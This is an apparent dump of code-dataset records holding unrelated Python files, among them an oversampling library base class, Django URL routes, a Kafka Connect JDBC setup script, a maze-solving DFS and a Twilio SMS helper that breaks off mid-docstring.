\".join(event[\"args_split\"][1:]))\n","repo_name":"chiefnoah/bitbot","sub_path":"modules/echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12878975686","text":"\"\"\"\r\nThis module implements the Oversampling base class.\r\n\"\"\"\r\n\r\nimport time\r\nimport warnings\r\n\r\nfrom ..config import suppress_internal_warnings\r\n\r\nfrom ._base import (StatisticsMixin, ParametersMixin, RandomStateMixin,\r\n coalesce_dict)\r\nfrom ._metrictensor import MetricLearningMixin\r\nfrom ._simplexsampling import SimplexSamplingMixin\r\n\r\nfrom .._logger import logger\r\n_logger = logger\r\n\r\n__all__= ['OverSampling',\r\n 'OverSamplingSimplex',\r\n 'OverSamplingBase',\r\n 'RandomSamplingMixin']\r\n\r\nclass RandomSamplingMixin(RandomStateMixin):\r\n \"\"\"\r\n This is the random sampling mixin class\r\n \"\"\"\r\n def __init__(self, random_state=None):\r\n \"\"\"\r\n Constructor of the mixin.\r\n\r\n Args:\r\n random_state (int/None/np.random.RandomState): initial random\r\n state\r\n \"\"\"\r\n RandomStateMixin.__init__(self, random_state)\r\n\r\n def get_params(self, deep=False):\r\n \"\"\"\r\n Return the parameter dictionary.\r\n\r\n Args:\r\n deep (bool): whether it should be a deep query\r\n\r\n Returns:\r\n dict: the parameter dictionary\r\n \"\"\"\r\n return RandomStateMixin.get_params(self, deep)\r\n\r\n def sample_between_points(self, x_vector, y_vector):\r\n \"\"\"\r\n Sample randomly along the line between two points.\r\n Args:\r\n x_vector (np.array): point 1\r\n y_vector (np.array): point 2\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return x_vector + (y_vector - x_vector)\\\r\n * self.random_state.random_sample()\r\n\r\n def sample_between_points_componentwise(self, x_vector, y_vector, mask=None):\r\n \"\"\"\r\n Sample each dimension separately between the two points.\r\n Args:\r\n x_vector (np.array): point 1\r\n y_vector (np.array): point 2\r\n mask (np.array): array of 0,1s - specifies which dimensions\r\n to sample\r\n Returns:\r\n 
np.array: the new sample being generated\r\n \"\"\"\r\n if mask is None:\r\n return x_vector + (y_vector - x_vector)*self.random_state.random_sample()\r\n\r\n return x_vector + (y_vector - x_vector)*self.random_state.random_sample()*mask\r\n\r\n def sample_by_jittering(self, x_vector, std):\r\n \"\"\"\r\n Sample by jittering.\r\n Args:\r\n x_vector (np.array): base point\r\n std (float): standard deviation\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return x_vector + (self.random_state.random_sample() - 0.5)*2.0*std\r\n\r\n def sample_by_jittering_componentwise(self, x_vector, std):\r\n \"\"\"\r\n Sample by jittering componentwise.\r\n Args:\r\n x_vector (np.array): base point\r\n std (np.array): standard deviation\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return x_vector + (self.random_state.random_sample(len(x_vector))-0.5)*2.0 * std\r\n\r\n def sample_by_gaussian_jittering(self, x_vector, std):\r\n \"\"\"\r\n Sample by Gaussian jittering\r\n Args:\r\n x_vector (np.array): base point\r\n std (np.array): standard deviation\r\n Returns:\r\n np.array: the new sample\r\n \"\"\"\r\n return self.random_state.normal(x_vector, std)\r\n\r\nclass OverSamplingBase(StatisticsMixin,\r\n ParametersMixin,\r\n MetricLearningMixin):\r\n \"\"\"\r\n Base class of oversampling methods\r\n \"\"\"\r\n\r\n categories = []\r\n\r\n cat_noise_removal = 'NR'\r\n cat_dim_reduction = 'DR'\r\n cat_uses_classifier = 'Clas'\r\n cat_sample_componentwise = 'SCmp'\r\n cat_sample_ordinary = 'SO'\r\n cat_sample_copy = 'SCpy'\r\n cat_memetic = 'M'\r\n cat_density_estimation = 'DE'\r\n cat_density_based = 'DB'\r\n cat_extensive = 'Ex'\r\n cat_changes_majority = 'CM'\r\n cat_uses_clustering = 'Clus'\r\n cat_borderline = 'BL'\r\n cat_application = 'A'\r\n cat_metric_learning = 'CD'\r\n\r\n def __init__(self, checks=None):\r\n \"\"\"\r\n Constructor of the base class.\r\n\r\n Args:\r\n checks (dict): the check list\r\n \"\"\"\r\n StatisticsMixin.__init__(self)\r\n ParametersMixin.__init__(self)\r\n MetricLearningMixin.__init__(self)\r\n checks_default = {'min_n_min': 2,\r\n 'check_np': True}\r\n self.checks = coalesce_dict(checks, checks_default)\r\n\r\n def det_n_to_sample(self, strategy, n_maj=None, n_min=None):\r\n \"\"\"\r\n Determines the number of samples to generate\r\n Args:\r\n strategy (str/float): if float, the fraction of the difference\r\n of the minority and majority numbers to\r\n generate, like 0.1 means that 10% of the\r\n difference will be generated if str,\r\n like 'min2maj', the minority class will\r\n be upsampled to match the cardinality\r\n of the majority class\r\n n_maj (int/None): the number of majority samples\r\n n_min (int/None): the number of minority samples\r\n\r\n Returns:\r\n int: the number of samples to generate\r\n \"\"\"\r\n if n_maj is None:\r\n n_maj = self.class_stats[self.maj_label]\r\n if n_min is None:\r\n n_min = self.class_stats[self.min_label]\r\n\r\n if isinstance(strategy, (int, float)):\r\n return max([0, int((n_maj - n_min)*strategy)])\r\n\r\n raise ValueError(f\"{self.__class__.__name__} Value {strategy} \"\\\r\n \"for parameter strategy is not supported\")\r\n\r\n def fit_resample(self, X, y):\r\n \"\"\"\r\n Alias of the function \"sample\" for compatibility with imbalanced-learn\r\n pipelines\r\n\r\n Args:\r\n X (np.array): the feature vectors\r\n y (np.array): the target labels\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n return self.sample(X, y)\r\n\r\n def sampling_algorithm(self, X, y):\r\n \"\"\"\r\n The 
algorithm to be implemented.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n return X, y\r\n\r\n def sample(self, X, y):\r\n \"\"\"\r\n Sampling interface function.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n _logger.info(\"%s: Running sampling via %s\",\r\n self.__class__.__name__,\r\n self.descriptor())\r\n\r\n self.class_label_statistics(y)\r\n\r\n for key, item in self.checks.items():\r\n if key == 'min_n_min':\r\n if self.class_stats[self.min_label] <= item:\r\n msg = f\"{self.__class__.__name__}: Too few minority samples\"\\\r\n \" for sampling\"\r\n _logger.info(msg)\r\n return X.copy(), y.copy()\r\n if key == 'min_n_dim':\r\n if X.shape[1] < item:\r\n _logger.info(\"%s: not enough dimensions %d\",\r\n self.__class__.__name__, X.shape[1])\r\n return X.copy(), y.copy()\r\n\r\n return self.sampling_algorithm(X, y)\r\n\r\n def return_copies(self, X, y, msg):\r\n \"\"\"\r\n Returns copies of the data with logger message.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n msg (str): the logging message\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n _logger.info(\"%s: returning copies for %s\",\r\n self.__class__.__name__, msg)\r\n\r\n if not suppress_internal_warnings():\r\n warnings.warn(f\"{self.__class__.__name__}: returning copies for {msg}\")\r\n\r\n return X.copy(), y.copy()\r\n\r\n def sample_with_timing(self, X, y):\r\n \"\"\"\r\n Execute the sampling with timing.\r\n\r\n Args:\r\n X (np.array): features\r\n y (np.array): labels\r\n msg (str): the logging message\r\n\r\n Returns:\r\n np.array, np.array: the oversampled dataset\r\n \"\"\"\r\n begin = time.time()\r\n\r\n X_samp, y_samp = self.sample(X, y)\r\n\r\n _logger.info(\"%s: runtime: %f\", self.__class__.__name__,\r\n (time.time() - begin))\r\n return X_samp, y_samp\r\n\r\n def preprocessing_transform(self, X):\r\n \"\"\"\r\n Transforms new data according to the possible transformation\r\n implemented by the function \"sample\".\r\n\r\n Args:\r\n X (np.array): features\r\n\r\n Returns:\r\n np.array: transformed features\r\n \"\"\"\r\n return X\r\n\r\n def get_params(self, deep=False):\r\n \"\"\"\r\n Returns the parameters of the object as a dictionary.\r\n\r\n Returns:\r\n dict: the parameters of the object\r\n \"\"\"\r\n _ = deep\r\n return {}\r\n\r\n def set_params(self, **params):\r\n \"\"\"\r\n Set parameters\r\n\r\n Args:\r\n params (dict): dictionary of parameters\r\n \"\"\"\r\n\r\n for key, value in params.items():\r\n setattr(self, key, value)\r\n\r\n return self\r\n\r\n def descriptor(self):\r\n \"\"\"\r\n The descriptor of the class\r\n\r\n Returns:\r\n str: JSON description of the current sampling object\r\n \"\"\"\r\n return str((self.__class__.__name__, str(self.get_params())))\r\n\r\n def __str__(self):\r\n \"\"\"\r\n The string representation\r\n\r\n Returns:\r\n str: the descriptor\r\n \"\"\"\r\n return self.descriptor()\r\n\r\n\r\nclass OverSampling(OverSamplingBase, RandomSamplingMixin):\r\n \"\"\"\r\n The oversampling base class.\r\n \"\"\"\r\n def __init__(self, random_state=None, checks=None):\r\n OverSamplingBase.__init__(self, checks)\r\n RandomSamplingMixin.__init__(self, random_state)\r\n\r\n def get_params(self, deep=False):\r\n return {**RandomSamplingMixin.get_params(self, deep),\r\n 'class_name': self.__class__.__name__}\r\n\r\n\r\nclass 
OverSamplingSimplex(OverSamplingBase, SimplexSamplingMixin):\r\n \"\"\"\r\n The oversampling simplex base class.\r\n \"\"\"\r\n def __init__(self,\r\n *,\r\n n_dim=2,\r\n simplex_sampling='random',\r\n within_simplex_sampling='random',\r\n gaussian_component=None,\r\n random_state=None,\r\n checks=None):\r\n OverSamplingBase.__init__(self, checks)\r\n\r\n if checks is not None and 'simplex_dim' in checks:\r\n if n_dim != checks['simplex_dim']:\r\n warnings.warn(f\"Simplex dimensions {n_dim} not supported \"\\\r\n f\"with the method {self.__class__.__name__} \"\\\r\n f\"forcing n_dim={checks['simplex_dim']}\")\r\n n_dim = checks['simplex_dim']\r\n\r\n SimplexSamplingMixin.__init__(self,\r\n n_dim=n_dim,\r\n simplex_sampling=simplex_sampling,\r\n within_simplex_sampling=within_simplex_sampling,\r\n gaussian_component=gaussian_component,\r\n random_state=random_state)\r\n\r\n def get_params(self, deep=False):\r\n return {**SimplexSamplingMixin.get_params(self, deep),\r\n 'class_name': self.__class__.__name__}\r\n","repo_name":"analyticalmindsltd/smote_variants","sub_path":"smote_variants/base/_oversampling.py","file_name":"_oversampling.py","file_ext":"py","file_size_in_byte":11924,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"37"} +{"seq_id":"1924461859","text":"import nltk\nimport re\nfrom nltk.corpus import stopwords\nimport gensim\nfrom gensim.parsing.preprocessing import STOPWORDS\nfrom nltk.corpus import stopwords\nstop_words = stopwords.words('english')\nstop_words.extend('\\n')\nimport string\n\n\ndef preprocessing_pipeline(text):\n text_1 = []\n for char in text:\n if char not in string.punctuation:\n text_1.append(char)\n cleaned_text = \"\".join(text_1)\n text_list = []\n text = str(cleaned_text)\n text_without_urls = re.sub(r'http\\S+|www.\\S+', '', cleaned_text)\n text_list.append(text_without_urls)\n results = []\n tokens = gensim.utils.simple_preprocess(cleaned_text)\n for token in tokens:\n if len(token) >= 3 and token not in stop_words:\n results.append(token)\n cleaned_text = \" \".join(results)\n return cleaned_text \n \n","repo_name":"amanshah22073/Spam-Ham-Classifier-App","sub_path":"preprocessing_pipeline.py","file_name":"preprocessing_pipeline.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29473596515","text":"from django.urls import path,include\nfrom rest_framework import routers\nfrom .views import (\n home,\n BookListView,\n BookDetailView,\n AuthorListView,\n AuthorDetailView,\n LoanedBooksByUserListView,\n LoanedBooksListView,\n renew_book_librarian,\n AuthorCreateView,\n AuthorUpdate,\n AuthorDelete,\n BookCreateView,\n BookUpdate,\n BookDelete,\n BlogDetailView,\n about,\n dashboard,\n profile,\n # form,\n BlogCreateView,\n BookInstanceCreateView,\n signUpView,\n \n \n)\nurlpatterns = [\n path('author/create/', AuthorCreateView.as_view(), name='author-create'),\n path('user/register/', signUpView, name='register'),\n path('book/create/', BookCreateView.as_view(), name='book-create'),\n path('blog/create/', BlogCreateView.as_view(), name='blog-create'),\n path('',home,name=\"catalog\"),\n path('dashboard/',dashboard,name=\"dashboard\"),\n path('profile/',profile,name=\"profile\"),\n path('book/loan/', BookInstanceCreateView, name='loan-book'),\n path('about/',about,name=\"about\"),\n # path('form/',form,name=\"form\"),\n path('blog//',BlogDetailView.as_view(),name=\"blog\"),\n 
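# the detail/update/delete routes below capture the record's primary key from the URL\n 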
path('book/list/',BookListView.as_view(),name=\"books\"),\n path('mybooks/',LoanedBooksByUserListView.as_view(), name='my-borrowed'),\n path('book/<int:pk>/',BookDetailView.as_view(),name=\"book\"),\n path('author/list/',AuthorListView.as_view(),name=\"authors\"),\n path('books/borrowed/',LoanedBooksListView.as_view(), name='all-borrowed'),\n path('book/<int:pk>/renew/', renew_book_librarian, name='renew-book-librarian'),\n path('book/<int:pk>/update/', BookUpdate.as_view(), name='book-update'),\n path('book/<int:pk>/delete/',BookDelete.as_view(), name='book-delete'),\n path('author/<int:pk>/',AuthorDetailView.as_view(),name=\"author\"),\n path('author/<int:pk>/update/', AuthorUpdate.as_view(), name='author-update'),\n path('author/<int:pk>/delete/',AuthorDelete.as_view(), name='author-delete'),\n]\n","repo_name":"belhazzh5/library-dash","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25926713248","text":"from typing import List, Optional, Sequence\nfrom sqlalchemy import delete, select, update\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import joinedload\n\nfrom src.models.v1.users import Member, Role\n\n\nclass RoleRepository:\n def __init__(self, session: AsyncSession):\n self.session = session\n\n async def add(self, member_role: Role) -> Role:\n self.session.add(member_role)\n await self.session.commit()\n return member_role\n\n async def get_all(self) -> Sequence[Role]:\n result = await self.session.execute(select(Role))\n return result.scalars().all()\n\n async def filter_by_member(self, member_id: str) -> Optional[List[Role]]:\n member = await (\n self.session.execute(select(Member).filter_by(id=member_id))\n )\n member = member.scalars().first()\n\n if member is None:\n return None\n\n await self.session.refresh(member, ['roles'])\n\n return member.roles\n\n async def get_by_id(self, role_id: str) -> Role | None:\n query = await (\n self.session.execute(select(Role).where(Role.id == role_id))\n )\n role = query.scalars().first()\n\n return role\n\n async def get_by_name(self, role_name: str) -> Role | None:\n query = await (\n self.session.execute(select(Role).filter_by(name=role_name))\n )\n return query.scalars().first()\n\n async def get_by_name_with_permissions(\n self, role_name: str) -> Role | None:\n result = await self.session.execute(\n select(Role)\n .options(joinedload(Role.permissions))\n .filter_by(name=role_name)\n )\n\n return result.unique().scalar_one_or_none()\n\n async def update(self, role_id: str, role_data: dict) -> Role:\n query = (\n update(Role).\n where(Role.id == role_id).\n values(**role_data).\n returning(Role)\n )\n result = await self.session.execute(query)\n await self.session.commit()\n return result.scalar_one()\n\n async def delete(self, role_id: str) -> None:\n query = delete(Role).where(Role.id == role_id)\n await self.session.execute(query)\n await self.session.commit()\n","repo_name":"jutsuteck/devjutsu","sub_path":"jutsu-services/auth-service/src/repositories/role_repository.py","file_name":"role_repository.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27994478591","text":"from cryptocoins.coins.trx.utils import is_valid_tron_address, get_latest_tron_block_num\nfrom cryptocoins.coins.trx.wallet import trx_wallet_creation_wrapper\nfrom cryptocoins.utils.register import register_coin\n\nTRX = 7\nCODE = 'TRX'\nDECIMALS = 
2\n\nTRX_CURRENCY = register_coin(\n currency_id=TRX,\n currency_code=CODE,\n address_validation_fn=is_valid_tron_address,\n wallet_creation_fn=trx_wallet_creation_wrapper,\n latest_block_fn=get_latest_tron_block_num,\n blocks_diff_alert=100,\n)\n","repo_name":"Polygant/OpenCEX-backend","sub_path":"cryptocoins/coins/trx/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"13924923167","text":"import numpy as np\n\ndef DFS_Find_Path(row, col, maze):\n visited = np.zeros((row, col)) # mark the visited cells\n visited[0][0] = 1\n path = [[0,0]]\n choice_ind = [] # save the index (from path) of more than one choice pos\n choices = [] # save the choices of more than one choice pos\n cur = [0,0] # start from [0,0]\n visited_cells = 1\n while cur != [row-1, col-1]:\n # check neighbor\n neighbor = []\n # condition: not edge, not wall, not previous pos\n if cur[0]<row-1 and maze[3*cur[0]+2, 3*cur[1]+1]==0.5 and visited[cur[0]+1, cur[1]]==0: # down\n neighbor.append([cur[0]+1, cur[1]])\n visited[cur[0]+1, cur[1]] = 1\n visited_cells += 1\n if cur[1]<col-1 and maze[3*cur[0]+1, 3*cur[1]+2]==0.5 and visited[cur[0], cur[1]+1]==0: # right\n neighbor.append([cur[0], cur[1]+1])\n visited[cur[0], cur[1]+1] = 1\n visited_cells += 1\n if cur[0]>0 and maze[3*cur[0], 3*cur[1]+1]==0.5 and visited[cur[0]-1, cur[1]]==0: # up\n neighbor.append([cur[0]-1, cur[1]])\n visited[cur[0]-1, cur[1]] = 1\n visited_cells += 1\n if cur[1]>0 and maze[3*cur[0]+1, 3*cur[1]]==0.5 and visited[cur[0], cur[1]-1]==0: # left\n neighbor.append([cur[0], cur[1]-1])\n visited[cur[0], cur[1]-1] = 1\n visited_cells += 1\n # choose next pos\n if len(neighbor) == 1: # only one choice\n cur = [neighbor[0][0], neighbor[0][1]]\n path.append(cur)\n elif len(neighbor) == 0: # no choice, backtrack to the latest position that had more than one choice\n cur = choices[-1][0]\n path = path[:choice_ind[-1]]\n path.append(cur)\n visited_cells += 1\n if len(choices[-1]) == 1: # run out of choice, remove from the saving list\n choice_ind = choice_ind[:-1]\n choices = choices[:-1]\n else:\n choices[-1] = choices[-1][1:] # choice - 1\n else: # more than one choice, save it\n cur = [neighbor[0][0], neighbor[0][1]]\n path.append(cur)\n choice_ind.append(len(path)-1)\n choices.append(neighbor[1:])\n return path, visited_cells\n\n\n\n","repo_name":"Weiwei-Wan/AI-navigate-Maze-with-UI","sub_path":"DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"22980434099","text":"import asyncio\nimport json\nfrom confluent_kafka import Producer, Consumer\nfrom dataclasses import dataclass, field\nimport random\n\nBROKER_URL = \"localhost:9092\"\n\nimport requests\n\nKAFKA_CONNECT_URL = \"http://localhost:8083/connectors\"\nCONNECTOR_NAME = \"user-info\"\n\n\ndef configure_connector():\n \"\"\"Calls Kafka Connect to create the Connector\"\"\"\n print(\"creating or updating kafka connect connector...\")\n\n rest_method = requests.post\n resp = requests.get(f\"{KAFKA_CONNECT_URL}/{CONNECTOR_NAME}\")\n if resp.status_code == 200:\n return\n\n #\n # TODO: Complete the Kafka Connect Config below.\n # See: https://docs.confluent.io/current/connect/references/restapi.html\n # See: https://docs.confluent.io/current/connect/filestream_connector.html#filesource-connector\n #\n resp = rest_method(\n KAFKA_CONNECT_URL,\n headers={\"Content-Type\": \"application/json\"},\n data=json.dumps(\n {\n \"name\": \"clicks-jdbc\", # TODO\n \"config\": {\n \"connector.class\": \"io.confluent.connect.jdbc.JdbcSourceConnector\", # TODO\n \"topic.prefix\": CONNECTOR_NAME, # TODO\n \"mode\": \"incrementing\", # TODO\n \"incrementing.column.name\": \"id\", # TODO\n \"table.whitelist\": \"user_info\", # TODO\n \"tasks.max\": 1,\n 
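# connection settings below assume the course's local dockerized Postgres; adjust for other setups\n 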
\"connection.url\": \"jdbc:postgresql://localhost:5432/docker\",\n \"connection.user\": \"postgres\",\n \"key.converter\": \"org.apache.kafka.connect.json.JsonConverter\",\n \"key.converter.schemas.enable\": \"false\",\n \"value.converter\": \"org.apache.kafka.connect.json.JsonConverter\",\n \"value.converter.schemas.enable\": \"false\",\n },\n \n },\n \n ),\n )\n\n # Ensure a healthy response was given\n # Ensure a healthy response was given\n try:\n resp.raise_for_status()\n except:\n print(f\"failed creating connector: {json.dumps(resp.json(), indent=2)}\")\n exit(1)\n print(\"connector created successfully.\")\n print(\"Use kafka-console-consumer and kafka-topics to see data!\")\n\n\nasync def consume():\n c = Consumer(\n {\n \"bootstrap.servers\": BROKER_URL, \n \"group.id\": \"0\",\n \"auto.offset.reset\": \"earliest\",\n }\n\n )\n c.subscribe([CONNECTOR_NAME])\n while True:\n #\n # TODO: Write a loop that uses consume to grab 5 messages at a time and has a timeout.\n # See: https://docs.confluent.io/current/clients/confluent-kafka-python/index.html?highlight=partition#confluent_kafka.Consumer.consume\n #\n messages = c.consume(5, timeout=1.0)\n # TODO: Print something to indicate how many messages you've consumed. Print the key and value of\n # any message(s) you consumed\n print(f\"consumed {len(messages)} messages\")\n for message in messages:\n print(f\"consume message {message.key()}: {message.value()}\")\n\n # Do not delete this!\n await asyncio.sleep(0.01)\n\n\nasync def log_task():\n \"\"\"Runs the log task\"\"\"\n consumer = asyncio.create_task(consume())\n configure_connector()\n await consumer\n\n\ndef run():\n \"\"\"Runs the simulation\"\"\"\n try:\n asyncio.run(log_task())\n except KeyboardInterrupt as e:\n print(\"shutting down\")\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"ahmed-hassan97/Udacity-Data-streaming-Nanodegree","sub_path":"Kafka Connect JDBC Source/Kafka_Connect_JDBC_Source.py","file_name":"Kafka_Connect_JDBC_Source.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"20245645666","text":"# Test of consumering process\n\n\nimport sys,pickle,pika,time\nimport darknet\nimport mysql.connector\nconfig = {\n 'user': '****',\n 'password': '****',\n# 'host': '127.0.0.1', #localhost\n 'host':'host.docker.internal',\n 'database': 'test',\n 'raise_on_warnings': True\n}\ncnx = mysql.connector.connect(**config)\ncur = cnx.cursor()\nnet = darknet.load_net(b\"/opt/numpydarknet_gpu/cfg/yolov3.cfg\", b\"/opt/numpydarknet_gpu/yolov3.weights\", 0)\nmeta = darknet.load_meta(b\"/opt/numpydarknet_gpu/cfg/coco.data\")\n\ndef callback(ch, method, properties, body):\n mdata = pickle.loads(body)\n print('working on count:',mdata['count'])\n #time.sleep(20)\n\n result=darknet.detect_np(net, meta, mdata['buff'])\n print(mdata['count'],result)\n dic={'bear':0, 'zebra':0}\n for ob in result:\n ani=ob[0].decode()\n if ani in dic and dic[ani]= threshold:\n sqlQuery = \"INSERT INTO %s VALUES (%d, %d, %.2f)\" % (tableName, i, j, salesMatrixEst[i,j])\n cur.execute(sqlQuery)\n\n conn.commit()\n conn.close()\n \ndef updateRecommendations(db_name, criteria):\n salesMatrixEst = generateRecommendations(db_name, criteria)\n updateSalesEstimationTable(db_name, criteria, salesMatrixEst)\n \ndef updateRecommendationsWithThreshold(db_name, criteria, threshold):\n salesMatrixEst = generateRecommendations(db_name, criteria)\n updateSalesEstimationTableWithThreshold(db_name, criteria, 
salesMatrixEst, threshold)\n \n \ndef updateMarginalSalesTensor(db_name, desiredFields):\n conn = sqlite3.connect(db_name)\n cur = conn.cursor()\n\n tableName = \"MarginalSalesTensor_%s%s%s\" % (desiredFields[0][:-5], desiredFields[1][:-5], desiredFields[2][:-5])\n\n sqlQuery = \"DROP TABLE IF EXISTS %s\" % tableName\n cur.execute(sqlQuery)\n\n sqlQuery = \"CREATE TABLE %s (%s INT, %s INT, %s INT, Amount REAL)\" % (tableName, desiredFields[0], desiredFields[1], desiredFields[2])\n cur.execute(sqlQuery)\n\n temp = \"%s, %s, %s\" % (desiredFields[0], desiredFields[1], desiredFields[2])\n sqlQuery = \"SELECT \" + temp + \", SUM(Amount) FROM SalesTensor GROUP BY \" + temp \n cur.execute(sqlQuery)\n\n col0 = []\n col1 = []\n col2 = []\n data = []\n\n for values in cur:\n col0.append(values[0])\n col1.append(values[1])\n col2.append(values[2])\n data.append(values[3])\n\n for i in range(len(data)):\n sqlQuery = \"INSERT INTO %s VALUES (%d, %d, %d, %.2f)\" % (tableName, col0[i], col1[i], col2[i], data[i])\n cur.execute(sqlQuery) \n\n conn.commit()\n conn.close()\n \ndef updateAllMarginalSalesTensors(db_name):\n desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"DowIndex\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"HourIndex\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n #desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"ItemIndex\"]\n #updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"WeekIndex\", \"ItemG3Index\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"DowIndex\", \"HourIndex\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"DowIndex\", \"ItemG3Index\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n\n desiredFields = [\"CustomerIndex\", \"HourIndex\", \"ItemG3Index\"]\n updateMarginalSalesTensor(db_name, desiredFields)\n \n \ndef updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, numCustomers):\n dataDict = {}\n for idx in range(numCustomers): \n customerIndex = idx\n salesMatrix = SalesFunctions.getSalesMatrixOfCustomer(db_name, customerIndex, desiredFields, \"sum\", desiredShapes)\n\n dataDict.update({str(idx):salesMatrix})\n\n filename = 'database/MarginalSalesTensor_Customer%s%s.mat' % (desiredFields[0][:-5], desiredFields[1][:-5]) \n sio.savemat(filename, dataDict)\n \n\ndef updateAllMarginalSalesTensorMat(db_name):\n dimensions = [\"WeekIndex\", \"DowIndex\", \"HourIndex\", \"ItemG3Index\"]\n DATABASE_SHAPE = DatabaseInfoFunctions.getDatabaseShape(db_name)\n shapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[1], DATABASE_SHAPE[2], DATABASE_SHAPE[4]] \n\n desiredFields = [\"WeekIndex\", \"DowIndex\"]\n desiredShapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[1]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n\n desiredFields = [\"WeekIndex\", \"HourIndex\"]\n desiredShapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[2]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"WeekIndex\", \"ItemG3Index\"]\n desiredShapes = [DATABASE_SHAPE[0], DATABASE_SHAPE[4]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"DowIndex\", \"HourIndex\"]\n desiredShapes = [DATABASE_SHAPE[1], DATABASE_SHAPE[2]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = 
[\"DowIndex\", \"ItemG3Index\"]\n desiredShapes = [DATABASE_SHAPE[1], DATABASE_SHAPE[4]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n \n desiredFields = [\"HourIndex\", \"ItemG3Index\"]\n desiredShapes = [DATABASE_SHAPE[2], DATABASE_SHAPE[4]]\n updateMarginalSalesTensorMat(db_name, desiredFields, desiredShapes, DATABASE_SHAPE[5])\n ","repo_name":"koptagel/obaseV2","sub_path":"OfflineFunctions.py","file_name":"OfflineFunctions.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6139048946","text":"#! python3\n\n\"\"\"\nSimple module that uses Twilio to send SMS messages to yourself. This module was\ninspired by Al Sweigart's \"Automate the Boring Stuff\" (Project: “Just Text Me”\nModule in Chapter 16).\n\nPossible areas for future development:\n\n - Support SMS messages with media (e.g. images).\n - Allow usage beyond restrictions of Twilio free account\n (e.g. send to/from multiple phone numbers).\n\"\"\"\n\n# std\nimport argparse\nfrom configparser import ConfigParser\nimport logging\nimport os\n\n# 3rd party\nimport backoff\nfrom twilio.rest import Client\n\n# logging\nLOG_FILEPATH = os.path.expanduser('~') + '/dev/logs.txt'\nlogging.basicConfig(filename=LOG_FILEPATH, level=logging.INFO)\nLOGGER = logging.getLogger('text_myself')\n\n# global constants\nCONFIG_FILEPATH = os.path.expanduser('~') + '/dev/py_config.ini'\n\ndef get_sms_credentials(config_filepath=None):\n '''\n Fetches Twilio credentials from a Config .ini file stored locally.\n\n Args:\n config_filepath: String that is the full path on the local machine\n to a .ini file (in the style of ConfigParser) that contains\n Twilio API credentials.\n\n Returns:\n credentials: Dictionary containing the `ACCOUNT_SID` and `AUTH_TOKEN`\n for the Twilio API.\n '''\n if not config_filepath:\n config_filepath = CONFIG_FILEPATH\n if not os.path.exists(CONFIG_FILEPATH):\n raise ValueError('Path provided for config file does not exist')\n\n config = ConfigParser()\n config.read(config_filepath)\n credentials = {}\n try:\n credentials['ACCOUNT_SID'] = config['Twilio']['ACCOUNT_SID']\n credentials['AUTH_TOKEN'] = config['Twilio']['AUTH_TOKEN']\n credentials['FROM_PHONE_NUMBER'] = config['Twilio']['FROM_PHONE_NUMBER']\n credentials['TO_PHONE_NUMBER'] = config['General']['MY_PHONE_NUMBER']\n except Exception as e:\n print(config_filepath)\n print('An exception occurred when reading config file: %s' % e)\n\n return credentials\n\ndef send_sms_message(client=None, from_phone_number=None, to_phone_number=None,\n message=None):\n '''\n Sends a simple, text-only SMS message using the Twilio REST 